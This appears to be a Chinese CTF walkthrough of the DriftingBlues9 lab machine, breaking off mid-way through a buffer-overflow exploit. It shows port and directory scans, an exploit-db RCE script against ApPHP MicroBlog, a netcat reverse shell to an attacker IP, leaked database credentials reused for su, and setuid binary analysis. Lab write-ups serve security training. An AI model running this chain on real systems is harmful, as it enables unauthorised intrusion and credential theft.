![\"image-20240413182659546\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156941.png\")
<\/div>\n
![\"image-20240413183029623\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156942.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 172.20.10.6 -- -A<\/code><\/pre>\nOpen 172.20.10.6:80\nOpen 172.20.10.6:111\nOpen 172.20.10.6:36168\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))\n|_http-title: ApPHP MicroBlog\n|_http-generator: ApPHP MicroBlog vCURRENT_VERSION\n|_http-favicon: Unknown favicon MD5: 9252836E46BB0304BED26A5B96DF4DD4\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.10 (Debian)\n| http-cookie-flags: \n| \/: \n| PHPSESSID: \n|_ httponly flag not set\n111\/tcp open rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n| program version port\/proto service\n| 100000 2,3,4 111\/tcp rpcbind\n| 100000 2,3,4 111\/udp rpcbind\n| 100000 3,4 111\/tcp6 rpcbind\n| 100000 3,4 111\/udp6 rpcbind\n| 100024 1 36168\/tcp status\n| 100024 1 38464\/tcp6 status\n| 100024 1 46499\/udp6 status\n|_ 100024 1 49425\/udp status\n36168\/tcp open status syn-ack 1 (RPC #100024)<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.6\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,git,jpg,txt,png\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 276]\n\/images (Status: 301) [Size: 311] [--> http:\/\/172.20.10.6\/images\/]\n\/index.php (Status: 200) [Size: 5650]\n\/docs (Status: 301) [Size: 309] [--> http:\/\/172.20.10.6\/docs\/]\n\/page (Status: 301) [Size: 309] [--> http:\/\/172.20.10.6\/page\/]\n\/header.php (Status: 200) [Size: 13]\n\/admin (Status: 301) [Size: 310] [--> http:\/\/172.20.10.6\/admin\/]\n\/footer.php (Status: 500) [Size: 614]\n\/license (Status: 301) [Size: 312] [--> http:\/\/172.20.10.6\/license\/]\n\/README.txt (Status: 200) [Size: 975]\n\/js (Status: 301) [Size: 307] [--> http:\/\/172.20.10.6\/js\/]\n\/include (Status: 301) [Size: 312] [--> http:\/\/172.20.10.6\/include\/]\n\/backup (Status: 301) [Size: 311] [--> http:\/\/172.20.10.6\/backup\/]\n\/styles (Status: 301) [Size: 311] [--> http:\/\/172.20.10.6\/styles\/]\n\/INSTALL.txt (Status: 200) [Size: 1201]\n\/.php (Status: 403) [Size: 276]\n\/wysiwyg (Status: 301) [Size: 312] [--> http:\/\/172.20.10.6\/wysiwyg\/]\n\/server-status (Status: 403) [Size: 276]\n\/mails (Status: 301) [Size: 310] [--> http:\/\/172.20.10.6\/mails\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.6<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.6\n+ Target Hostname: 172.20.10.6\n+ Target Port: 80\n+ Start Time: 2024-04-13 06:33:24 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.10 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https:\/\/portswigger.net\/kb\/issues\/00600300_private-ip-addresses-disclosed\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is "127.0.1.1". See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ Apache\/2.4.10 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/: DEBUG HTTP verb may show server debugging information. See: https:\/\/docs.microsoft.com\/en-us\/visualstudio\/debugger\/how-to-enable-debugging-for-aspnet-applications?view=vs-2017\n+ \/backup\/: Directory indexing found.\n+ \/backup\/: This might be interesting.\n+ \/images\/: Directory indexing found.\n+ \/docs\/: Directory indexing found.\n+ \/styles\/: Directory indexing found.\n+ \/INSTALL.txt: Default file found.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/admin\/home.php: Admin login page\/section found.\n+ 8103 requests: 0 error(s) and 16 item(s) reported on remote host\n+ End Time: 2024-04-13 06:33:39 (GMT-4) (15 seconds)\n---------------------------------------------------------------------------<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240413183101074\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/172.20.10.6\/README.txt<\/code><\/pre>\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ \n\/\/ Advanced Power of PHP\n\/\/ ---------------------\n\/\/ http:\/\/www.apphp.com\n\/\/ \n\/\/ ApPHP MicroBlog Free\n\/\/\n\/\/ Version: 1.0.1\n\/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\nThank you for using ApPHP.com software!\n-----------------------------------------------------------------------------------\nIt's very easy to get started with ApPHP MicroBlog!!!\n1. Installation:\n http:\/\/apphp.com\/php-microblog\/index.php?page=installation\n2. Getting started:\n http:\/\/apphp.com\/php-microblog\/index.php?page=getting_started\nIf you have any troubles, find an example of code in the folder, named "examples" \n-----------------------------------------------------------------------------------\nFor more information visit: \n site http:\/\/apphp.com\/php-microblog\/index.php?page=examples\n forum http:\/\/www.apphp.com\/forum\/<\/code><\/pre>\nhttp:\/\/172.20.10.6\/backup\/<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.6\/wysiwyg\/<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.6\/mails\/<\/code><\/pre>\n<\/div><\/p>\n# http:\/\/172.20.10.6\/mails\/password_forgotten.txt\nHello _USER_NAME_!<br> <br>\nYou or someone else asked for your login info on our site, _WEB_SITE_\nYour Login Info:\n------------------------<br\/>\nUsername: _USER_NAME_\nPassword: _USER_PASSWORD_\n------------------<br\/>\nBest regards,\n_WEB_SITE_<\/code><\/pre>\n\u67e5\u627e\u76f8\u5173\u6f0f\u6d1e<\/h3>\n
<\/div><\/p>\n\u6709\u4e00\u4e2a\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ searchsploit -m php\/webapps\/33070.py\n Exploit: ApPHP MicroBlog 1.0.1 - Remote Command Execution\n URL: https:\/\/www.exploit-db.com\/exploits\/33070\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/33070.py\n Codes: OSVDB-106352, OSVDB-106351\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/driftingblues9\/33070.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python3 33070.py -h \n File "\/home\/kali\/temp\/driftingblues9\/33070.py", line 14\n print " -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-"\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nSyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py -h\n -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\n[*] Testing for vulnerability...\nTraceback (most recent call last):\n File "33070.py", line 38, in <module>\n r = urllib.urlopen(url)\n File "\/usr\/lib\/python2.7\/urllib.py", line 87, in urlopen\n return opener.open(url)\n File "\/usr\/lib\/python2.7\/urllib.py", line 215, in open\n return getattr(self, name)(url)\n File "\/usr\/lib\/python2.7\/urllib.py", line 471, in open_file\n return self.open_local_file(url)\n File "\/usr\/lib\/python2.7\/urllib.py", line 485, in open_local_file\n raise IOError(e.errno, e.strerror, e.filename)\nIOError: [Errno 2] No such file or directory: "-h?j);echo(base64_decode('MTQyMGM2YWZhNjVjMTY5')=\/"\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py \n -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\nUsage: python 33070.py http:\/\/target\/blog\/index.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py http:\/\/172.20.10.6 \n -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\n[*] Testing for vulnerability...\n[+] Website is vulnerable\n\n[*] Fecthing phpinfo\n PHP Version 5.6.40-0+deb8u12\n System Linux debian 3.16.0-4-586 #1 Debian 3.16.51-2 (2017-12-03) i686\n Loaded Configuration File \/etc\/php5\/apache2\/php.ini\n Apache Version Apache\/2.4.10 (Debian)\n User\/Group www-data(33)\/33\n Server Root \/etc\/apache2\n DOCUMENT_ROOT \/var\/www\/html\n PHP Version 5.6.40-0+deb8u12\n allow_url_fopen On On\n allow_url_include Off Off\n disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,\n open_basedir no value no value\n System V Message based IPC Wez Furlong\n System V Semaphores Tom May\n System V Shared Memory Christian Cartus\n\n[*] Fetching include\/base.inc.php\n<?php\n \/\/ DATABASE CONNECTION INFORMATION\n define('DATABASE_HOST', 'localhost'); \/\/ Database host\n define('DATABASE_NAME', 'microblog'); \/\/ Name of the database to be used\n define('DATABASE_USERNAME', 'clapton'); \/\/ User name for access to database\n define('DATABASE_PASSWORD', 'yaraklitepe'); \/\/ Password for access to database\n define('DB_ENCRYPT_KEY', 'p52plaiqb8'); \/\/ Database encryption key\n define('DB_PREFIX', 'mb101_'); \/\/ Unique prefix of all table names in the database\n ?>\n\n[*] Testing remote execution\n[+] Remote exec is working with system() :)\nSubmit your commands, type exit to quit\n> whoami\nwww-data\n\n> nc -e \/bin\/bash 172.20.10.8 1234<\/code><\/pre>\n\u6267\u884c\u6210\u529f\uff01<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@debian:\/var\/www\/html$ ls -la\ntotal 84\ndrwxr-xr-x 13 root root 4096 May 9 2021 .\ndrwxr-xr-x 3 root root 4096 May 9 2021 ..\n-rw-r--r-- 1 root root 1039 May 20 2009 .htaccess\n-rw-r--r-- 1 root root 1201 Jan 29 2014 INSTALL.txt\n-rw-r--r-- 1 root root 975 Jan 29 2014 README.txt\ndrwxr-xr-x 3 root root 4096 May 9 2021 admin\ndrwxr-xr-x 2 root root 4096 May 9 2021 backup\ndrwxr-xr-x 2 root root 4096 May 9 2021 docs\n-rw-r--r-- 1 root root 1191 Jan 29 2014 footer.php\n-rw-r--r-- 1 root root 1653 Nov 15 2009 header.php\ndrwxr-xr-x 4 root root 4096 May 9 2021 images\ndrwxrwxrwx 3 root root 4096 May 9 2021 include\n-rw-r--r-- 1 root root 6409 Mar 10 2014 index.php\ndrwxr-xr-x 2 root root 4096 May 9 2021 js\ndrwxr-xr-x 2 root root 4096 May 9 2021 license\ndrwxr-xr-x 2 root root 4096 May 9 2021 mails\ndrwxr-xr-x 2 root root 4096 May 9 2021 page\n-rw-r--r-- 1 root root 1728 Feb 3 2014 rss.xml\ndrwxr-xr-x 4 root root 4096 May 9 2021 styles\ndrwxr-xr-x 8 root root 4096 May 9 2021 wysiwyg\n(remote) www-data@debian:\/var\/www\/html$ sudo -l\nbash: sudo: command not found\n(remote) www-data@debian:\/var\/www\/html$ cd \/home\n(remote) www-data@debian:\/home$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 May 9 2021 .\ndrwxr-xr-x 21 root root 4096 May 9 2021 ..\ndr-x------ 2 clapton clapton 4096 May 9 2021 clapton\n(remote) www-data@debian:\/home$ cd clapton\/\nbash: cd: clapton\/: Permission denied\n(remote) www-data@debian:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:103:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:104:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:105:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false\nDebian-exim:x:104:109::\/var\/spool\/exim4:\/bin\/false\nstatd:x:105:65534::\/var\/lib\/nfs:\/bin\/false\nmessagebus:x:106:112::\/var\/run\/dbus:\/bin\/false\nmysql:x:107:114:MySQL Server,,,:\/var\/lib\/mysql:\/bin\/false\nclapton:x:1000:1000:,,,:\/home\/clapton:\/bin\/bash\n(remote) www-data@debian:\/home$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# m h dom mon dow user command\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@debian:\/home$ su clapton \nPassword: \nsu: Authentication failure\n(remote) www-data@debian:\/home$ su root\nPassword: \nsu: Authentication failure\n(remote) www-data@debian:\/home$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/bin\/su\n\/bin\/mount\n\/bin\/umount\n\/sbin\/mount.nfs\n\/usr\/bin\/procmail\n\/usr\/bin\/at\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/sbin\/exim4\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n........\n(remote) www-data@debian:\/var\/www\/html\/include$ cat base.inc.php \n<?php\n \/\/ DATABASE CONNECTION INFORMATION\n define('DATABASE_HOST', 'localhost'); \/\/ Database host\n define('DATABASE_NAME', 'microblog'); \/\/ Name of the database to be used\n define('DATABASE_USERNAME', 'clapton'); \/\/ User name for access to database\n define('DATABASE_PASSWORD', 'yaraklitepe'); \/\/ Password for access to database\n define('DB_ENCRYPT_KEY', 'p52plaiqb8'); \/\/ Database encryption key\n define('DB_PREFIX', 'mb101_'); \/\/ Unique prefix of all table names in the database\n ?><\/code><\/pre>\n\u627e\u5230\u5bc6\u7801\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
clapton\nyaraklitepe<\/code><\/pre>\n\u5207\u6362\u7528\u6237<\/h3>\n(remote) www-data@debian:\/var\/www\/html\/include$ su clapton\nPassword: \nclapton@debian:\/var\/www\/html\/include$ cd \/home clapton\nclapton@debian:\/home$ \n(local) pwncat$ \n(remote) clapton@debian:\/home$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 May 9 2021 .\ndrwxr-xr-x 21 root root 4096 May 9 2021 ..\ndr-x------ 2 clapton clapton 4096 May 9 2021 clapton\n(remote) clapton@debian:\/home$ cd clapton\/\n(remote) clapton@debian:\/home\/clapton$ ls -la\ntotal 24\ndr-x------ 2 clapton clapton 4096 May 9 2021 .\ndrwxr-xr-x 3 root root 4096 May 9 2021 ..\n-rwsr-xr-x 1 root root 5150 Sep 22 2015 input\n-rwxr-xr-x 1 root root 201 May 9 2021 note.txt\n-rw-r--r-- 1 clapton clapton 32 May 9 2021 user.txt\n(remote) clapton@debian:\/home\/clapton$ cat note.txt\nbuffer overflow is the way. ( \u0361\u00b0 \u035c\u0296 \u0361\u00b0)\n\nif you're new on 32bit bof then check these:\n\nhttps:\/\/www.tenouk.com\/Bufferoverflowc\/Bufferoverflow6.html\nhttps:\/\/samsclass.info\/127\/proj\/lbuf1.htm\n\n(remote) clapton@debian:\/home\/clapton$ cat user.txt \nF569AA95FAFF65E7A290AB9ED031E04F(remote) clapton@debian:\/home\/clapton$ sudo -l\nbash: sudo: command not found\n(remote) clapton@debian:\/home\/clapton$ cd input \nbash: cd: input: Not a directory\n(remote) clapton@debian:\/home\/clapton$ file input \ninput: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped\n(remote) clapton@debian:\/home\/clapton$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/driftingblues9\n(local) pwncat$ download input\ninput \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 5.2\/5.2 KB \u2022 ? \u2022 0:00:00[06:56:26] downloaded 5.15KiB in 0.11 seconds<\/code><\/pre>\n\u5206\u6790\u7a0b\u5e8f<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ file input \ninput: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ checksec input \nError: No option selected. Please select an option.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ checksec --file=input\nRELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE\nNo RELRO No canary found NX disabled No PIE No RPATH No RUNPATH 69 Symbols No 0 2 input<\/code><\/pre>\nida \u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
# main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n char dest; \/\/ [esp+11h] [ebp-9Fh]\n\n if ( argc <= 1 )\n {\n printf("Syntax: %s <input string>\\n", *argv);\n exit(0);\n }\n strcpy(&dest, argv[1]);\n return 0;\n}<\/code><\/pre>\n<\/div><\/p>\nstrcpy<\/code>\u662f\u4e00\u4e2a\u6bd4\u8f83\u8106\u5f31\u7684\u51fd\u6570\uff0c\u5e94\u8be5\u662f\u5728\u8fd9\u91cc\u8fdb\u884c\u6ea2\u51fa\uff0c\u5148\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n(remote) clapton@debian:\/home\/clapton$ .\/input flag\n(remote) clapton@debian:\/home\/clapton$ .\/input 1234\n(remote) clapton@debian:\/home\/clapton$ .\/input admin<\/code><\/pre>\n\u6ca1\u6709\u56de\u663e\u3002\u3002\u3002\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
(remote) clapton@debian:\/home\/clapton$ .\/input aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nSegmentation fault<\/code><\/pre>\n\u8bf4\u660e\u53ef\u4ee5\u8fdb\u884c\u6ea2\u51fa\u3002<\/p>\n
\u68c0\u67e5ALSR<\/h4>\n(remote) clapton@debian:\/home\/clapton$ cat \/proc\/sys\/kernel\/randomize_va_space\n2<\/code><\/pre>\n\u8bf4\u660e\u542f\u7528\u4e86\u3002\u3002\u3002<\/p>\n
\u751f\u6210\u6d4b\u8bd5\u5b57\u7b26<\/h4>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500$ locate pattern_create \n\/usr\/bin\/msf-pattern_create\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 500\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq<\/code><\/pre>\n\u6d4b\u8bd5<\/h4>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# gdb .\/input \nGNU gdb (Debian 13.2-1) 13.2\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType "show copying" and "show warranty" for details.\nThis GDB was configured as "x86_64-linux-gnu".\nType "show configuration" for configuration details.\nFor bug reporting instructions, please see:\n<https:\/\/www.gnu.org\/software\/gdb\/bugs\/>.\nFind the GDB manual and other documentation resources online at:\n <http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.\n\nFor help, type "help".\nType "apropos word" to search for commands related to "word"...\nReading symbols from .\/input...\n(No debugging symbols found in .\/input)\n(gdb) run 